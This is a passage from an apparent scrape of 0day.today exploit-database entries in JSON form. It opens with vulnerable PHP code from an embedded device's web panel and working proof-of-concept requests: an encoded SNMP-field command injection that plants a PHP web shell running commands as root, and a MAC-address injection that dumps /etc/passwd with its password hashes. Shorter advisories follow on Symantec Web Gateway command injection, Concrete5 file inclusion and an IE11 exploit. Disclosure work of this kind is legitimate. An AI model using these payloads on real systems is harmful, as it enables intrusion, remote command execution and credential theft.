\r\nproduction_test1.php:\r\n---------------------\r\n \r\n \r\n4: if( isset($_POST['macAddress']) )\r\n5: {\r\n6: shell_exec(\"echo \". $_POST['macAddress'] . \" > /mnt/mtd/mac_addr\");\r\n7: $mac = shell_exec(\"cat /mnt/mtd/mac_addr\");\r\n8: /*$result = $fail;\r\n9: echo $mac . \",\";\r\n10: echo $_POST['macAddress'];\r\n11: if( !strcmp($mac,$_POST['macAddress']) )\r\n12: $result = $success;\r\n13: echo \"verify - \" . $mac . \" - \" . $result;*/\r\n14: echo \"verify - \" . $mac;\r\n15:\r\n16: exit();\r\n17: }\r\n \r\n---------------------------------------------------------------------\r\n \r\n \r\nSNMP.php:\r\n---------\r\n \r\n \r\n34: if($_POST[\"SNMPAgent\"] === \"Enable\"){\r\n35: exec('kill -9 `ps | grep \"snmpd -c /mnt/mtd/snmpd.conf\" | cut -c 1-5`');\r\n36: setConf(\"/mnt/mtd/snmp_conf\", \"enable\", \"1\");\r\n37:\r\n38: if(!empty($_POST[\"CommuintyString\"]) && !empty($_POST[\"CommuintyWrite\"]))\r\n39: {\r\n40: exec(\"cp /etc/snmpd.conf /mnt/mtd/snmpd.conf\");\r\n41: exec(\"sed -i s/public/\".$_POST[\"CommuintyString\"].\"/g /mnt/mtd/snmpd.conf\");\r\n42: setConf(\"/mnt/mtd/snmp_conf\", \"pCommunity\", $_POST[\"CommuintyString\"]);\r\n43: setSnmpConf(1,$_POST[\"CommuintyString\"]);\r\n44: setSnmpConf(2,$_POST[\"CommuintyWrite\"]);\r\n45: $pCommunity = $_POST[\"CommuintyString\"];\r\n46: }\r\n \r\n---------------------------------------------------------------------\r\n \r\n \r\nSystem.php:\r\n-----------\r\n \r\n \r\n86: if(!empty($_POST['ChangeTime']) == \"1\"){\r\n87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){\r\n88:\r\n89: //Ray modify\r\n90: $datetime = date(\"mdHiY.s\", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));\r\n91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];\r\n92: \r\n93:\r\n94: if(isset($_POST['TimeZone'])){\r\n95: setTimeZone($_POST['TimeZone']);\r\n96: $orgZone = $_POST['TimeZone'];\r\n97: }\r\n98:\r\n99: exec('date '.$datetime);\r\n100: exec('hwclock -w');\r\n101: exec('hwclock -w -f /dev/rtc1');\r\n...\r\n...\r\n180: if(isset($_POST['TimeServer'])){\r\n181: //$TimeServer = ereg_ip($_POST['TimeServer']); \r\n182: if(!empty($_POST['TimeServer'])){\r\n183: $TimeServer = $_POST['TimeServer']; \r\n184:\r\n185: $returnStr = exec(\"/usr/bin/ntpclient -s -h \".$TimeServer . \" -i 1\");\r\n...\r\n...\r\n286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);\r\n...\r\n...\r\n292: exec('route add default gw '.$Gateway_setting, $str);\r\n...\r\n...\r\n336: function ereg_ip($ipstring){\r\n337: $ipstring=trim($ipstring); //\u79fb\u9664\u524d\u5f8c\u7a7a\u767d\r\n338: //\u683c\u5f0f\u932f\u8aa4\r\n339: if(!ereg(\"^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$\",$ipstring))return 0;\r\n340: //\u5167\u5bb9\u6aa2\u67e5\r\n341: $ip_segment =split(\"\\.\",$ipstring); //\u6ce8\u610f\u4e00\u5b9a\u8981\u52a0 \"\\\"\uff0c\u5426\u5247\u6703\u5206\u4e0d\u958b\u3002\r\n342: foreach($ip_segment as $k =>$v){\r\n343: if($v >255){\r\n344: return 0;\r\n345: }\r\n346: $ip_segment[$k]=(int)$ip_segment[$k]; //\u6d88\u9664ip\u4e2d\u76840\uff0cex:1.020.003.004 =>1.20.3.4\r\n347: } //end foreach\r\n348: $ipstring =\"$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]\"; //\u5c07\u5b57\u4e32$ip\u8655\u7406\r\n349: return $ipstring;\r\n350: }\r\n \r\n---------------------------------------------------------------------\r\n \r\n \r\nUploadEXE.php:\r\n--------------\r\n \r\n \r\n72: if(isset($_POST['hasFile'])){\r\n73: if ($_FILES['ExeFile']['error'] > 0){\r\n74: echo 'Error: ' . $_FILES['FW']['error'];\r\n75: }else{\r\n76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';\r\n...\r\n...\r\n80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);\r\n81: chmod(\"/ramdisk/\".$_FILES['ExeFile']['name'], \"0777\");\r\n82: $fp = popen(\"\\\"/ramdisk/\".$_FILES['ExeFile']['name'].\"\\\"\", \"r\");\r\n \r\n---------------------------------------------------------------------\r\n---------------------------------------------------------------------\r\n---------------------------------------------------------------------\r\n \r\n \r\n#1\r\n--\r\n \r\nPoC Request:\r\n \r\ncurl -i -s -k -X 'POST' \\\r\n -H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \\\r\n --data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \\\r\n 'https://192.168.0.17/SNMP.php?Menu=SMP'\r\n \r\n...\r\n \r\ncurl -k https://192.168.0.17/test251.php?c=whoami;echo \" at \";uname -a\r\n \r\nResponse:\r\n \r\nroot \r\n at\r\nLinux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown\r\n \r\n \r\n#2\r\n--\r\n \r\nPoC Request:\r\n \r\nPOST /production_test1.php HTTP/1.1\r\nHost: 192.168.0.17\r\nUser-Agent: ZSL-Injectinator/3.1 (Unix)\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n \r\nmacAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd\r\n \r\n \r\nResponse:\r\n \r\nHTTP/1.1 200 OK\r\nX-Powered-By: PHP/5.3.9\r\nContent-type: text/html\r\nConnection: close\r\nDate: Fri, 17 Jan 2003 16:58:52 GMT\r\nServer: lighttpd/1.4.30-devel-1321\r\nContent-Length: 751\r\n \r\nverify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh\r\nbin:x:1:1:bin:/bin:/bin/sh\r\ndaemon:x:2:2:daemon:/usr/sbin:/bin/sh\r\nadm:x:3:4:adm:/adm:/bin/sh\r\nlp:x:4:7:lp:/var/spool/lpd:/bin/sh\r\nsync:x:5:0:sync:/bin:/bin/sync\r\nshutdown:x:6:11:shutdown:/sbin:/sbin/shutdown\r\nhalt:x:7:0:halt:/sbin:/sbin/halt\r\nuucp:x:10:14:uucp:/var/spool/uucp:/bin/sh\r\noperator:x:11:0:Operator:/var:/bin/sh\r\nnobody:x:99:99:nobody:/home:/bin/sh\r\nadmin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script\r\nuser:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script\r\nservice:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh\r\nwww:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh\r\nwww2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/26156", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-12T21:48:39", "references": [], "edition": 2, "description": "Symantec Web Gateway versions 5.2.2 and below suffer from an OS command injection vulnerability in new_whitelist.php.", "reporter": "EgiX", "published": "2016-10-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Symantec Web Gateway 5.2.2 OS Command Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5313"], "modified": "2016-10-07T00:00:00", "id": "1337DAY-ID-25374", "href": "https://0day.today/exploit/description/25374", "sourceData": "------------------------------------------------------------------------------------\r\nSymantec Web Gateway <= 5.2.2 (new_whitelist.php) OS Command Injection \r\nVulnerability\r\n------------------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttps://www.symantec.com/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 5.1.1.24, 5.2.1.80 and 5.2.2.118. Other versions might be affected.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in the /spywall/new_whitelist.php script:\r\n\r\n141. $isNew = $_POST['isNew'];\r\n142. $sid = $_POST['sid'];\r\n143. $exceptions = array();\r\n144. $last_modified = time();\r\n145. /* validate input */\r\n146.\r\n147. if (!$sid && !isValidWhiteDomain($white_ip) && \r\n!isIpSubnet($white_ip)) {\r\n148. $errors['white_ip'] = 'Please enter a valid domain or IP \r\naddress or IP/mask.';\r\n149. }\r\n\r\nThe vulnerability exists because the validation checks may be bypassed \r\nby setting the \"sid\" POST parameter to a\r\nvalue different from zero. In this way, even though the \"white_ip\" POST \r\nparameter (assigned to the $white_ip variable)\r\nis not a valid domain or IP address, it will be passed to the \r\nadd_whitelist() function as its $url parameter:\r\n\r\n329. function add_whitelist ($signature, $url, $whitelist, \r\n$ignore_auth, $restoreConfig = 0) {\r\n330. [...]\r\n331. if (!isCiu()){\r\n332. if ($restoreConfig) {\r\n333. syscall(\"sudo /usr/local/bin/updateDB 2 1 $url \r\n$whitelist $ignore_auth [...]\r\n334. } else {\r\n335. syscall(\"sudo /usr/local/bin/updateDB 2 1 $url \r\n$whitelist $ignore_auth [...]\r\n336. }\r\n337. }\r\n\r\nThis can be exploited to inject and execute arbitrary OS commands with \r\nthe privileges of the \"root\" user on the appliance.\r\nSuccessful exploitation of this vulnerability requires an user account \r\nwith read-write permissions (POLICY_LEVEL).\r\n\r\n\r\n[-] Solution:\r\n\r\nUpdate to version 5.2.5.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[09/07/2016] - Vendor notified\r\n[11/07/2016] - Vendor response\r\n[09/09/2016] - Vendor asks to confirm this is fixed in version 5.2.5\r\n[15/09/2016] - Feedback sent to the vendor\r\n[05/10/2016] - Publication of vendor\"s advisory: https://goo.gl/aOJq5A\r\n[06/10/2016] - Publication of this advisory\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2016-5313 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25374"}, {"lastseen": "2018-03-19T09:18:37", "references": [], "edition": 2, "description": "Exploit for php platform in category web applications", "reporter": "Egidio Romano", "published": "2016-06-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-06-29T00:00:00", "id": "1337DAY-ID-25147", "href": "https://0day.today/exploit/description/25147", "sourceData": "-------------------------------------------------------------------------------\r\nConcrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability\r\n-------------------------------------------------------------------------------\r\n \r\n \r\n[-] Software Link:\r\n \r\nhttps://www.concrete5.org/\r\n \r\n \r\n[-] Affected Versions:\r\n \r\nVersion 5.7.3.1 and probably other versions.\r\n \r\n \r\n[-] Vulnerability Description:\r\n \r\nThe vulnerable code is located within the \"Application::dispatch()\" method:\r\n \r\n326. public function dispatch(Request $request)\r\n327. {\r\n328. if ($this->installed) {\r\n329. $response = $this->getEarlyDispatchResponse();\r\n330. }\r\n331. if (!isset($response)) {\r\n332. $collection = Route::getList();\r\n333. $context = new \\Symfony\\Component\\Routing\\RequestContext();\r\n334. $context->fromRequest($request);\r\n335. $matcher = new UrlMatcher($collection, $context);\r\n336. $path = rtrim($request->getPathInfo(), '/') . '/';\r\n337. try {\r\n338. $request->attributes->add($matcher->match($path));\r\n339. $matched = $matcher->match($path);\r\n340. $route = $collection->get($matched['_route']);\r\n341. Route::setRequest($request);\r\n342. $response = Route::execute($route, $matched);\r\n \r\nThe vulnerability exists because the path for the incoming request is retrieved using the\r\n\"Request::getPathInfo()\" method from the Symfony framework, which allows to specify the path\r\nfor the request within some HTTP headers (like \"X-Original-URL\" and some others). So, it might\r\nbe possible to specify paths containing \"dot-dot-slash\" sequences without worrying about URL\r\nencoding and path normalization done by the web server. This could be exploited by unauthenticated\r\nattackers to include arbitrary .php files located outside the Concrete5 root directory or from the\r\nConcrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)\r\nby sending an HTTP request like this:\r\n \r\nGET /concrete5/index.php HTTP/1.1\r\nHost: localhost\r\nX-Original-Url: /tools/../../index\r\nConnection: keep-alive\r\n \r\nThe dispatching process for this request will try to re-include the index.php file,\r\nand this will end up with an unexpected error.\r\n \r\n \r\n[-] Solution:\r\n \r\nUpdate to a fixed version.\r\n \r\n \r\n[-] Disclosure Timeline:\r\n \r\n[05/05/2015] - Vulnerability details sent through HackerOne\r\n[02/10/2015] - CVE number requested\r\n[19/12/2015] - Vulnerability fixed on the GitHub repository\r\n[26/06/2016] - Vulnerability publicly disclosed on HackerOne\r\n[28/06/2016] - Publication of this advisory\r\n \r\n \r\n[-] CVE Reference:\r\n \r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas not assigned a CVE identifier for this vulnerability.\r\n \r\n \r\n[-] Credits:\r\n \r\nVulnerability discovered by Egidio Romano.\r\n \r\n \r\n[-] Original Advisory:\r\n \r\nhttp://karmainsecurity.com/KIS-2016-10\r\n \r\n \r\n[-] Other References:\r\n \r\nhttps://hackerone.com/reports/59665\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25147"}, {"lastseen": "2018-04-06T03:40:45", "references": [], "edition": 2, "description": "Exploit for windows platform in category local exploits", "reporter": "Brian Pak", "published": "2016-06-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (M", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-06-22T00:00:00", "id": "1337DAY-ID-25604", "href": "https://0day.today/exploit/description/25604", "sourceData": "Source: https://github.com/theori-io/cve-2016-0189\r\n \r\n# CVE-2016-0189\r\nProof-of-Concept exploit for CVE-2016-0189 (VBScript Memory Corruption in IE11)\r\n \r\nTested on Windows 10 IE11.\r\n \r\n### Write-up\r\nhttp://theori.io/research/cve-2016-0189\r\n \r\n### To run\r\n1. Download `support/*.dll` (or compile \\*.cpp for yourself) and `exploit/*.html` to a directory.\r\n2. Serve the directory using a webserver (or python's simple HTTP server).\r\n3. Browse with a victim IE to `vbscript_bypass_pm.html`.\r\n4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.)\r\n \r\nEDB-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25604"}]}}
